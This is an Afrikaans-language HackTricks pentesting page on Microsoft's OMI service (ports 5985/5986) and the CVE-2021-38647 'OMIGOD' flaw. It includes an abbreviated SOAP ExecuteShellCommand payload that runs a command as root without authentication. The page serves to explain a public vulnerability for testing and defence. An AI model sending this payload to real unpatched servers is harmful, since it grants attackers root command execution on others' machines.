hacktricks/network-services-pentesting/5985-5986-pentesting-omi.md

# 5985,5986 - Pentesting OMI

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

### **Basiese Inligting**

**OMI** word aangebied as 'n **[open-source](https://github.com/microsoft/omi)** hulpmiddel deur Microsoft, ontwerp vir afstands konfigurasie bestuur. Dit is veral relevant vir Linux bedieners op Azure wat dienste soos:

- **Azure Automatisering**
- **Azure Outomatiese Opdatering**
- **Azure Operasionele Bestuursuite**
- **Azure Log Analise**
- **Azure Konfigurasiebestuur**
- **Azure Diagnostiek**

Die proses `omiengine` word geaktiveer en luister op alle interfaces as root wanneer hierdie dienste geaktiveer word.

**Standaard poorte** wat gebruik word is **5985** (http) en **5986** (https).

### **[CVE-2021-38647 Kwetsbaarheid](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)**

Soos waargeneem op 16 September, is Linux bedieners wat in Azure ontplooi is met die genoemde dienste kwesbaar weens 'n kwesbare weergawe van OMI. Hierdie kwesbaarheid lê in die OMI bediener se hantering van boodskappe deur die `/wsman` eindpunt sonder om 'n Verifikasie kop te vereis, wat die kliënt verkeerdelik autoriseer.

'n Aanvaller kan dit benut deur 'n "ExecuteShellCommand" SOAP payload te stuur sonder 'n Verifikasie kop, wat die bediener dwing om opdragte met root regte uit te voer.
```xml
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
```
Vir meer inligting oor hierdie CVE **[kyk hier](https://github.com/horizon3ai/CVE-2021-38647)**.

## Verwysings

* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)
* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}